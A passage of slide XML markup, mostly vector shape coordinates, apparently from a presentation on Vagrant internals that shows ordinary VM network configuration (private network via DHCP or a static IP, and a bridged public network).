                  <a:lnTo>
                    <a:pt x="314661" y="147558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347516" y="133342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370884" y="106931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376123" y="72472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377221" y="70958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380747" y="73218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385018" y="78226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388353" y="84956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411291" y="137236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438957" y="170947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468950" y="187428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498870" y="188016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526316" y="174049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548888" y="146865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564184" y="107803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553324" y="65139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528187" y="35018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492567" y="16819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450258" y="9922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405052" y="13707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360743" y="27552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333043" y="2252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305522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92182" y="1276464"/>
              <a:ext cx="66522" cy="638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62680" y="1406842"/>
              <a:ext cx="63868" cy="665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64254" y="1361605"/>
              <a:ext cx="142392" cy="1004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25418" y="1285659"/>
              <a:ext cx="349250" cy="51435"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="6680" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6680" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6680" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="58585" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52425" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52425" y="40182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18440" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18440" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25107" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25107" y="11176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51904" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58585" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58585" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="107099" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66382" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66382" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83121" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83121" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89801" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89801" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107099" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107099" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="152323" y="45173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121069" y="45173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121069" y="27914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149504" y="27914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149504" y="21755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121069" y="21755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121069" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151193" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151193" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114388" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114388" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152323" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152323" y="45173"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="206959" y="51333"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191516" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190347" y="28727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188569" y="27914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193471" y="27216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196811" y="25920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201498" y="20929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203047" y="17602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203047" y="11137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202272" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200837" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199415" y="3797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197637" y="2590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195249" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192900" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189217" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161785" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161785" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168490" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168490" y="28435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178600" y="28435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179412" y="28867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180200" y="28994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181254" y="29248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182549" y="29476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183540" y="30124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184581" y="30772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198589" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206959" y="51333"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="253834" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247154" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247154" y="40182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220357" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213677" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213677" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219786" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219786" y="11176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246583" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253834" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253834" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="303466" y="45173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="272262" y="45173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272262" y="27914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300126" y="27914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300126" y="21755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272262" y="21755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272262" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302387" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302387" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265010" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265010" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303466" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303466" y="45173"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="51434">
                  <a:moveTo>
                    <a:pt x="349211" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="309067" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309067" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325805" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325805" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332473" y="51333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332473" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349211" y="6146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349211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93909" y="1291247"/>
              <a:ext cx="27940" cy="17780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27939" h="17780">
                  <a:moveTo>
                    <a:pt x="19951" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18135" y="17297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20561" y="16814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27317" y="10007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27317" y="5943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26314" y="4330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24549" y="2781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22809" y="1206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19951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447" y="781136"/>
              <a:ext cx="2845042" cy="1830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36519" y="1272374"/>
              <a:ext cx="257911" cy="1552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25965" y="933399"/>
              <a:ext cx="114363" cy="8256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60420" y="930109"/>
              <a:ext cx="81280" cy="86360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="81280" h="86359">
                  <a:moveTo>
                    <a:pt x="54279" y="44488"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51943" y="36855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46939" y="30518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44043" y="26746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44043" y="46659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44043" y="61353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42481" y="67119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="71285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36322" y="75438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32258" y="77520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21717" y="77520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17551" y="75438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17297" y="75095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14566" y="71285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11531" y="67119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10058" y="61353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10058" y="46659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11531" y="40932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14566" y="36766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17411" y="32778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17551" y="32600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21717" y="30518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32258" y="30518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36322" y="32600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39433" y="36855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42481" y="40932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44043" y="46659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44043" y="26746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42824" y="25146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36842" y="22199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24968" y="22199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10058" y="32778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10058" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10058" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10058" y="75095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12141" y="78828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14732" y="81508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17856" y="83248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21056" y="84988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24968" y="85852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36842" y="85852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42824" y="82981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47078" y="77520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51943" y="71285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54279" y="63563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54279" y="44488"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="81280" h="86359">
                  <a:moveTo>
                    <a:pt x="80848" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70802" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80848" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808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62046" y="930109"/>
              <a:ext cx="74536" cy="8585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25165" y="1344307"/>
              <a:ext cx="339090" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="339089" h="634">
                  <a:moveTo>
                    <a:pt x="0" y="228"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="338632" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="22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23922" y="2449700"/>
              <a:ext cx="2115185" cy="150495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2115185" h="150494">
                  <a:moveTo>
                    <a:pt x="2114638" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="150336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114638" y="150336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211463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23922" y="2449700"/>
              <a:ext cx="2115185" cy="150495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2115185" h="150494">
                  <a:moveTo>
                    <a:pt x="2114638" y="150336"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2114638" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="150336"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="22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64485" y="2479704"/>
              <a:ext cx="411251" cy="10735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45775" y="2481614"/>
              <a:ext cx="433240" cy="8393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99006" y="2479713"/>
              <a:ext cx="83185" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="83185" h="107950">
                  <a:moveTo>
                    <a:pt x="10045" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10045" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10045" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83185" h="107950">
                  <a:moveTo>
                    <a:pt x="82816" y="23583"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="72224" y="23583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53149" y="71107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34251" y="23583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23672" y="23583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48285" y="83248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46380" y="87934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719" y="99021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29222" y="99021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29222" y="107353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41579" y="107353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45085" y="106222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47764" y="104051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50546" y="101854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53327" y="97155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56095" y="90004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="235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6547" y="2449700"/>
              <a:ext cx="554990" cy="150495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="554990" h="150494">
                  <a:moveTo>
                    <a:pt x="554990" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="150336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554990" y="150336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55499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6547" y="2449700"/>
              <a:ext cx="554990" cy="150495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="554990" h="150494">
                  <a:moveTo>
                    <a:pt x="554990" y="150336"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="554990" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="150336"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="22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5820" y="2492834"/>
              <a:ext cx="207465" cy="809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pc="-55" dirty="0"/>
              <a:t>29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17" y="190436"/>
            <a:ext cx="17653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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-270" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr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89" y="699201"/>
            <a:ext cx="12623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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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5605" y="1323501"/>
            <a:ext cx="144195" cy="1442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7786" y="1626269"/>
            <a:ext cx="144202" cy="1442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0494" y="1172151"/>
            <a:ext cx="1584960" cy="579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marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”private_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>type: 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”dhcp”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565" marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”private_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>ip: 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”192.168.50.4”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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2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53202" y="1323552"/>
            <a:ext cx="145649" cy="145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87929" y="1172151"/>
            <a:ext cx="15741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marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network 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”public_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  bridge: 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”en1: Wi-Fi (AirPort)”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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3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1299" y="2296550"/>
            <a:ext cx="188958" cy="1889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0184" y="2286013"/>
            <a:ext cx="1875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95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DHCP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
